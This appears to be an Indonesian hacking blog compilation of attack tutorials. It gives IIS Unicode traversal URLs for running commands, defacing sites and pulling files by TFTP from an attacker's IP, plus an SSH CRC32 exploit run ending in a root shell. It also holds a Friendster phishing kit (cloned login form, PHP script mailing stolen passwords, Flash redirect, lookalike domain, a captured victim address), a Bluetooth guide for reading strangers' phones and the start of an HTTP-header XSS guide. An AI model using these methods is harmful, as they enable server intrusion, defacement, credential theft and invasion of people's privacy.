bisa and DL di http://accessftp.topcities.com/…. or memakai cara manual yg lebih sering kita gunakan ehehhehehhee…contoh:
http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR …
Kaduana : Muncul daftar file-file dari drive C pada komputer server
target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface…
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL
diatas menjadi empat bagian yaitu :
· Bagian host, yaitu “http://www.targethost.com”
· Bagian exploit string, yaitu “/scripts/..%255c..%255c”
· Bagian folder, yaitu “/winnt/system32/”
· Bagian command, yaitu “cmd.exe?/c+dir+c:\”
Kita lihat pada bagian command diatas menunjukkan perintah “dir c:\” yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti “dir d:\” atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda “+”. Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah “ipconfig.exe /all”
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss …hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran….(yg sabar yah nak nyari targetnyah…ehehhehehe).
Lanjuttt……udeh dapet site yg bug unicodenyah gak di patch..??….Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??…Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah…gak ada yahh ..??…coba deh koe ripresh lagehh…udah ketemuuu…nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah…..Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot….Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa….isinyah banyak banged yahh…..mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh… .hemm santeyy…oiyahh…lupa sayah…Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah….. truss kita cari dokumen web itu disitu utk kita RENAME….gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy…coba skrg koe buka site aslinyah di laen window….
http://www.targethost.com == neh yg ini……di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME….misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah…nah coba masukin salah satu dokumen web itu di site asli nyah… contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe
Pasti hasilnya akan seperti di bawah ini :
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.
Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.

Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :

dapat dilihat disini
Kita liat apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi
Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :


  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian command yaitu, cmdku.exe?/c+echo+
  • Bagian HTML
  • Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
    C:\InetPub\wwwroot\main.html
Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya :

  • http://www.targethost.com/scripts/..%255c..%255c
    /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
    up-load)+ C:\InetPub\wwwroot\main.html
Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.
Sayah akan uraikan juga URL tadee menjadi 4 bagian :

  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian folder, yaitu /winnt/system32/
  • Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
  • Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
    C:\InetPub\wwwroot\main.html
Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.
Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.
——————————————–END————————————————–
Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground…hehehehe “yang kreatif donk..!!”
Okeh sekrang kita ke UNIX yah…di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian “Hacking Shell”). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit “SSH CRC32 Exploit”, exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja seperti ini :
[root@juventini]# ./x10 -t1 192.168.1.120
password:
Target: Small – SSH-1.5-1.2.26
Attacking: 192.168.1.120:22
Testing if remote sshd is vulnerable # ATTACH NOWYES #
Finding h – buf distance (estimate)
(1 ) testing 0×00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h – buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0×00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0×00004000 # SURVIVED #
(5 ) binary-search: h: 0x083f97fc, slider: 0×00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0×00001000 # SEGV #
(7 ) binary-search: h: 0x083f9ffc, slider: 0×00000800 # SEGV #
(8 ) binary-search: h: 0x083f9bfc, slider: 0×00000400 # SEGV #
(9 ) binary-search: h: 0x083f99fc, slider: 0×00000200 # SURVIVED #
(10) binary-search: h: 0x083f9afc, slider: 0×00000100 # SEGV #
(11) binary-search: h: 0x083f9a7c, slider: 0×00000080 # SEGV #
(12) binary-search: h: 0x083f9a3c, slider: 0×00000040 # SEGV #
(13) binary-search: h: 0x083f9a1c, slider: 0×00000020 # SEGV #
(14) binary-search: h: 0x083f9a0c, slider: 0×00000010 # SURVIVED #
(15) binary-search: h: 0x083f9a14, slider: 0×00000008 # SURVIVED #
Bin search done, testing result
Finding exact h – buf distance
(16) trying: 0x083f9a14 # SURVIVED #
Exact match found at: 0x000065ec
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080865ec # SURVIVED #
Finding distance till stack buffer
(18) Trying: 0xb7f81400 # SEGV #
(19) Trying: 0xb7f81054 # SEGV #
(20) Trying: 0xb7f80ca8 # SEGV #
(21) Trying: 0xb7f808fc # SEGV #
(22) Trying: 0xb7f80550 # SEGV #
(23) Trying: 0xb7f801a4 # SEGV #
(24) Trying: 0xb7f7fdf8 # SEGV #
(25) Trying: 0xb7f7fa4c # SEGV #
(26) Trying: 0xb7f7f6a0 # SEGV #
(27) Trying: 0xb7f7f2f4 # SEGV #
(28) Trying: 0xb7f7ef48 # SEGV #
(29) Trying: 0xb7f7eb9c # SEGV #
(30) Trying: 0xb7f7e7f0 # SEGV #
(31) Trying: 0xb7f7e444 # SEGV #
(32) Trying: 0xb7f7e098 # SURVIVED # verifying
(33) Trying: 0xb7f7e098 # SEGV # OK
Finding exact h – stack_buf distance
(34) trying: 0xb7f7de98 slider: 0×0200# SURVIVED #
(35) trying: 0xb7f7dd98 slider: 0×0100# SURVIVED #
(36) trying: 0xb7f7dd18 slider: 0×0080# SEGV #
(37) trying: 0xb7f7dd58 slider: 0×0040# SEGV #
(38) trying: 0xb7f7dd78 slider: 0×0020# SURVIVED #
(39) trying: 0xb7f7dd68 slider: 0×0010# SEGV #
(40) trying: 0xb7f7dd70 slider: 0×0008# SEGV #
(41) trying: 0xb7f7dd74 slider: 0×0004# SURVIVED #
(42) trying: 0xb7f7dd72 slider: 0×0002# SEGV #
Final stack_dist: 0xb7f7dd74
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfa
ATTACH NOW
Changing MSW of return address to: 0×0808
Crash, finding next return address
Changing MSW of return address to: 0×0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6
ATTACH NOW
Changing MSW of return address to: 0×0808
Crash, finding next return address
Changing MSW of return address to: 0×0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc
ATTACH NOW
Changing MSW of return address to: 0×0808
Crash, finding next return address
Changing MSW of return address to: 0×0809
No Crash, might have worked
Reply from remote: CHRIS CHRIS
***** YOU ARE IN *****
localhost.localdomain
Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686
unknown
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
…..HOREEEEE…dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd
naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu…untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh…gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru…;)), gini caranya :

  1. ganti dulu nama indexnyamv index.htm oldindex.htm
  2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm
  3. masukan HTML yang kalian buat di vi ataupun pico tadi
  4. buka browser kalian….heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!!
Gitu aja kok caranya…mudah aja kan..?? hehehhe…intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula…so many exploit out thare…just get iT..!! hehehheudah dulu yah…BUBAYYYYYY!!!!!!!!!!!!

Phising – Hack Friendster

By : fauzan
Dalam komputer, istilah bahasa Inggris phishing adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi sensitif, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti e-mail atau pesan instan. Istilah ini muncul dari kata bahasa Inggris fishing (’memancing’),dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna. Oleh : http://id.wikipedia.org/wiki/Phishing.


Sedangkan menurut saya Phishing sendiri mempunya arti menyamarkan sesuatu yang asli dengan yang palsu, sehingga yang palsu benar-benar mirip dengan yang asli, dengan tujuan penipuan. Kasus Phishing pernah terjadi di Official Web site BCA Online, hingga sekarang yaitu FS.
Pembahasan ini sudah dijumpai dibanyak blog-blog namun pada umumnya hanya memberikan sedikit sekali gambaran bagaimana proses phishing itu terjadi, apabila tidak hati-hati maka account kita + passwordnya akan diketahui oleh orang lain.
Baiklah sekarang akan saya berikan gambaran mengenai Phishing di FS, dalam proses Phishing di FS ada beberapa hal yang harus diketahui(versi saya), yaitu :
1. Manajemen File URL.
2. Pemahaman Form HTML.
3. mail() command di PHP.
4. Pemahaman Redirection.
5. Kreatifitas difakename URL.
5 hal tersebut merupakan faktor wajib yang harus diketahui sebelum melakukan Phishing, mengapa karena 5 komponen dasar tersebut menentukan berhasil/tidaknya sebuah Phishing, saya jelaskan fungsional 5 komponen tersebut.
1.Manajemen File URL.
Pentingnya manajemen File Url adalah dimana proses pemalsuan sebuah form yang asli ke yg palsu/yg akan kita gunakan, haruslah benar” sama modelnya/bentuknya sehingga orang lain bila tidak sangat teliti akan terkecoh bahwa form yang ada dimonitornya adalah asli, bila menggunakan Mozilla Firefox anda bisa mencuri form Login FS dengan menggunakan perintah : File > Save Page As > Filename isi “index.htm” > dan Save as Type “Web page, complete”. Tujuan dari penyimpanan file login tersebut adalah untuk membuat Login FS vesi Fake-nya, setelah kita simpan, kemudian kita rubah form actionnya seperti penjelasan no 2. Kemudian semua file tadi kita Upload ke Free Hosting kesukaan kita, saya menggunakan http://www.ripway.com -> ( http://h1.ripway.com/friendsterid ). Alamat diatas modelnya sama persis dengan Form login FS sehingga jika kita tidak teliti sangat berbahaya, yang membedakan adalah slide foto tidak berubah jika di refresh, dan juga tanggalnya, dan perhatikan source htmlnya khususnya dibagian <form>.
2. Pemahaman Form HTML.
Form HTML merupakan komponen dasar untuk mengirim informasi calon korban yang perlu dipamahami adalah komponen <form>,<input> komponen <form> mempunyai sub komponen yaitu “method” dan “action”, dimana action sangat menentukan proses Phishing yang akan kita lakukan, dan untuk <input> penting pada komponen “name” di FS input ada 2 sub komponen penting pembawa bencana :) , yaitu “email” dan “password” dimana “email” adalah id login si calon korban, script dibawah ini adalah contoh kutipan form yang saya gunakan untuk Phishing di FS.
index.htm, form yang di edit untuk phishing

<form name="login_form" method="post" action="http://fakename.com/login.php">
Email: <input name="email" maxlength="100" size="22" alt="Email Address"
tabindex="1" style="width: 200px ! important;" value="" type="text">
Password: <input name="password" maxlength="10" size="22" alt="Password"
tabindex="2" style="width: 200px ! important;" type="password">
<td><div class="loginButton"><input value="Log In" tabindex="3" type="submit">
</form>

Yang saya rubah pada bagian “action” saja, diarahkan ke file penyetor password (login.php versi kita)yang nantinya dikirim ke e-mail kita menggunakan aplikasi PHP.
3. Function mail() di PHP.
Saya pilih opsi ini karena mudah menggunakannya, ada opsi lain misal store database, namun tambah ribed nantinya anda harus membuat database untuk memasuk kan email dan password korban, dan jika mencari free hostingan php yang support ke database agak sulit :) , lebih baik lagi jika anda mempunyai hostingan yang bayar dan support ke database plus function mail(), langsung saja, kita harus me ngetahui fungsi ini karena pada saat si target login di fake FS kita, maka disinilah password dan user name di setor ke kita, dengan menngunakan fungsi mail() di php password dan user di setor ke alamat e-mail kita, disini nama file yang digunakan adalah “login.php” file tersebut kita tempatkan di hostingan milik kita(baik yg free / bayar, pastinya harus support mail(), silahkan anda coba” terlebih dahulu, atau baca howto mail() function di php manual), script dibawah ini yang saya gunakan untuk mengirim user dan password sitarget ke e-mail saya:
login.php, store user + password ke e-mail
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap :) ’;
$message = $isi;
$headers = ‘Rejeki FS :) ’;
mail($to, $subject, $message, $headers);
?>

Sangat sederhana :) namun mematikan, jika ada yang login di fake FS kita maka user dan password akan dikirim ke “emailkita@fakename.com” dan kemudian halaman ini akan di redirect ke http://www.friendster.com”, akan kita bahas nanti mengenai redirect.
4. Pemahaman Redirection.
Redirection merupakan proses pemindahan halaman web secara otomatis/manual menggunakan script, script pertama redirection yang harus anda tahu adalah Redirection dari FS ke Fakefs kita, jadi option ini bisa menggunakan opsi manual dan otomatis, opsi manual bisa menggunakan gambar yang menarik sehingga jika kita klik gambar tersebut akan mengarah ke Fakefs kita, dan jika sudah ter klik dan target mengisikan login dan passwordnya di Fakefs kita, berhasil sudah cara ini, jika menggunakan opsi otomatis, yang saya gunakan adalah script di Flash berupa action script GetURL(”url”,”type”,”method”);, pada aplikasi flash jika kita menggunakan GetURL maka otomatis pada saat load animasi kita yang di dalamnya sudah disusupi GetURL maka halaman FS akan di redirect ke Fakefs kita (contoh : http://www.friendster.com/kuyamudik ). Jika halaman FS disamping kita buka menggunakan IE maka otomatis akan di redirect ke halaman Fakefs, karena di ditesti FS tersebut sudah ada file flash yang meredirect dari FS ke Fakefs, perhatikan address barnya, dan opsi ini berlaku jika menggunakan IE, jika pada Mozilla Firefox tidak berlaku, kecuali menggunakan type _blank.
Action Script yang saya gunakan di Flash:
press-fs.swf, file animasi disusupi action script redirection

getURL("http://friendster-id.cjb.net","_self","get");

Redirection ke 2 berada di file login.php dimana Email login dan password di kirim ke e-mail saya, karena menggunakan koneksi IIX, redirection ini tidak akan terasa, tau-tau anda sudah ada di halaman FS anda sendiri, padahal setelah anda login untuk ke 2 kalinya anda sudah terjebak, berikut script redirection ke 2 yang saya gunakan:
login.php, file pengirim Email login FS + password ke email saya

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.friendster.com">
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap :) ’;
$message = $isi;
$headers = ‘Rejeki FS :) ’;
mail($to, $subject, $message, $headers);
?>

5. Kreatifitas Fakename URL.
Bagian ini juga sangat mendukung suksesnya Phishing di FS, atau disebut dengan kreatifitas membuat domain palsu / alamat palsu untuk Fakefs kita, saya sendiri menggunakan Fakefs domain http://www.friendster-id.cjb.net dengan bantuan cjb setidaknya alamat depan fakefs tersebut sudah sama dengan FS nya, disini anda dituntun mencari yang bagus untuk Faking domainnya, sehingga orang akan tertipu jika hanya melihat pada bagian tampilan saja :) .
Rule Phishing FS, menurut gaya saya :) .

[Target]->[Buka dan Login FS]->[Lihat testi teman yang terinfeksi Redirection]
|– [Jika menggunakan Mozilla Firefox, halaman gagal di redirect]->[Gagal]->[X]
|– [jika menggunakan IE, halaman akan di redirect ke Fakefs]->[Login di Fakefs]
->[Email + Password di rekam & dikirim ke email saya]->[diredirect ke FS semula]
->[Phishing FS sukses].

Sederhana sekali bukan? :) .
Komponen-komponen yang saya pakai:
1. Freehosting di : http://www.ripway.com
(http://h1.ripway.com/friendsterid) Sebagai tempat menyimpan file FS palsu/Fakefs yang sudah saya modif di bagian formnya.
2. Freedomain : http://www.cjb.net (http://www.friendster-id.cjb.net)
Fake URL yang mirip dengan http://friendster.com, dan bila dibuka isinya adalah file yang ada di ripway.com
3. Hosting PHP :
Hostingan yang support dengan function mail() yang digunakan untuk eksekusi pengiriman email dan password si target, disini saya gunakan login.php, atau anda akan menggunakan aplikasi database, silahkan saja, atau write() terserah kreasi anda sekalian :) .

4. File Redirect :
Saya menggunakan Flash, karena option otomatis redirectnya :) , hanya kelemahannya di Firefox tidak mempan :) , file ini nantinya akan disertakan di testi target.

5. Email :
Alamat email untuk store email dan password target.
Contoh FS di comment/testinya sudah terkena Phishing :
http://www.friendster.com/kuyamudik
Contoh hasil target yang sukses terkirim di email saya:
± From Date Subject
============================================
± Nobody 10:16 am Friendster Trap :)
± Nobody 7:37 am Friendster Trap :)
± Nobody Mon, 10:37 pm Friendster Trap :)
± Nobody Mon, 10:25 pm Friendster Trap :)
Jika dibuka isinya:
=================================================
Rejeki FS :)
id: sapoedjagad@hotmail.com | password: s******t
PENCEGAHAN
Ada beberapa Opsi yang harus kita perhatikan untuk FS ini, diantaranya:

  1. Biasakan membuka FS menggunakan Mozilla Firefox :) .
  2. Matikan option auto approve, di FS kita karena jika ini tidak dilakukan maka bisa saja teman mengirim comment yang mengandung Phishing :) . Option -> Approve comments automatically: Pilih “Never”.
  3. Teliti jika ingin login lihat URL nya, jika bukan dari http://friendster.com maka jangan berani-berani login, close saja, dan buka http://friendster.com.
Hanya opsi tersebut yang dapat saya sampaikan, sering-sering cek menggunakan 2 Browser lebih bagus.
Artikel ini saya tulis karena iseng saja, ingin ngebajak FS temen hehe :D dan gunakan sebagai informasi yang positif, jika ada yg menyalahgunakan isi diartikel ini penulis tidak bertanggung jawab.

Isi jika E-Mail dibuka :D
Salam manis,
Note : ada beberapa link yang sudah miss, karena host di site gratisan :)
Hide “Phising Friendster (FS)”

Hacking Bluetooth

By : fauzan
Hacking Bluetooth 2010 / 2011 – Bluetooth Hacking 2010 / 2011
Welcome Back To MummyMaster.. Kzkzkz..
Gw mao berbagi & share lagi sama kalian kalian semua..
Klo yang udah pernah gak usah protes, klo yang belum pernah monggo di coba..
( Ok Coy!! <- Gaya Budi Handuk ) Wkwkwkkw… Hijack This!
Huammzz.. Setelah beberapa hari ngikut cyberwar, jenuh juga rasanya hidup gw ini. We win again from Israel in cyberwar.. Uye!! Hehe, akhirnya gw buat sebuah ke isengan lagi. Nyoba nyoba isengin bluetooth orang..
Oke lah semuanya, gak usah banyak basa basi kita lanjut ke tahap selanjutnya..
Pertama Anda harus Download dulu softwarenya,

Download Tipe Satu
Download Tipe Dua
Download Tipe Tiga


Yang bisa di lakuin klo lu install software itu:
Bisa buka dan baca SMS
Bisa Buka Phone Book
Bisa Ganti Profile
Bisa Maenin RIngtone
Bisa Maenin MP3
Bisa Restart Dan Matiin HP
Bisa Ganti Volume
Bisa Ngeblock Phone
Bisa Pura2 Nelpon Dari HP
Dan lain lainnya ( Ampir semua fasilitas bisa )
Wkwkwkw.. Kan lumayan klo cuma mo iseng2in orang :P Lucunya klo di HP orang yang punya bluetooth itu ada yang simpen b*k*p.. Wkwkwkwkw.. Lucu abis dah, waktu itu gw ngakak, abis gw maenin film yang itu dari HP orang via bluetoothnya.. Orangnya ampe kaget kaget, mana di kampus lagi.. Hahaha..  ( *Jadi inget waktu itu.. Gyahahaha.. )

Instructions

1.) Klo device dah konek, gunakan 0000 sebagai codenya
2.) Bluetooth harus turned on, sebelum loe jalanin BT application.
3.) Gunain Mozilla Untuk Download Softwarenya. ( Jangan lupa: File aslinya adalah *.jar )
Instalasi pake USB cable ( Sony Ericcson ):
1. Konekin HP ma Computernya.
2. Mount sebagai disk.
3. Drag  (SuperBluetoothHack_v108.jar) ke /MSSEMC/Media files/other/ .
4. Disconnekin USB.
5. Lanjut ke Folder “Other” di HP loe.
6. Cari Aplikasinya, Trus “Install”.
Instalasi General ( Super Bluetooth Hack Version )
1. Download
2. Copy ke mobile
3. Jalanin Installernya ( incidentally need JAVA )
4. Klo itu semuanya ada, loe baru bisa jalanin itu software
5. Pilih bahasa dan silakan di configure
6. Click Connection
7. Click Search Devices
8. Pilih the “Victim”
9. And Manage <- Korban telah di victim..
Untuk yang lain juga gak jauh beda, masing masing HP ada kriterianya sendiri. Loe coba cobain dah satu satu klo gak bisa. Soalnya gw gak punya banyak tipe HP.. Wkwkwkwk..
Klo dah ke install, silakan cari mangsa bluetooth HP orang lain yang lagi aktif. Haha.. Jangan Lupa Bluetooth Loe Aktifin dolo sebelum menjalankan aplikasinya.. Oke.. Selamat mencoba.. Semoga loe senang :P

Injecting Code Melalui HTTP Header

By : fauzan
Klien sebagai pengirim request memiliki kontrol penuh atas apa saja data yang dikirimkan ke server. Bila server lalai melakukan validasi input maka akibatnya bisa berbahaya. Umumnya attacker melakukan injeksi  melalui parameter pada GET atau form data pada POST. Padahal banyak jalan masuk lain yang bisa dicoba untuk menyerang server. Kali ini saya akan jelaskan bagaimana melakukan serangan XSS dan SQL injection dengan mengirimkan malicious tag/sql lewat header http.
Referer Header


Header ini berguna untuk menunjukkan dari mana request dilakukan. Contohnya ketika seseorang membuka halaman A, di dalamnya mengandung gambar yang lokasinya di B, maka browser akan me-request image di B dengan menambahkan referer header berisi url A. Header referer ini bisa dimanfaatkan untuk mencuri sessionid bila session id ditaruh di URL seperti pada webmail telkom.net/plasa.com. Tapi kali ini fokus kita adalah tentang injection bukan session hijacking, lain kali saya akan bahas di artikel khusus tentang itu.
Untuk melihat bagaimana header referer dipakai dalam request, saya gunakan contoh ipmonkey.com yang dibuka dengan browser Firefox+Live Http Header addon. Pada halaman ipmonkey.com ada image tag yang URLnya adalah ipmonkey.com/ipmonkey.gif. Karena image tersebut berada pada URL www.ipmonkey.com, maka request image tersebut ditambahkan referer header berisi url http://www.ipmonkey.com.

http://www.ipmonkey.com/ipmonkey.gif
 
GET /ipmonkey.gif HTTP/1.1
Host: www.ipmonkey.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.ipmonkey.com/
XSS bisa dilakukan dengan memasukkan script atau tag html di header ini. Bila ada web application yang menampilkan isi header referer tanpa di-filter, maka code xss kita berhasil diinjeksi. Sebagai contoh bisa dicoba di web http://pgl.yoyo.org/http/browser-headers.php. Web itu menampilkan header http tanpa difilter. Bagaimana cara menginjeksi header referer? Saya menggunakan addon Modify Header di Firefox. Coba tambahkan header Referer yang berisi javascript seperti pada gambar di bawah ini:
add referer headeradd referer header
Setelah header referer ditambahkan, ketika saya coba mengakses web http://pgl.yoyo.org/http/browser-headers.php, maka javascript saya akan dieksekusi browser, hasilnya seperti pada gambar berikut:
xssedxssed
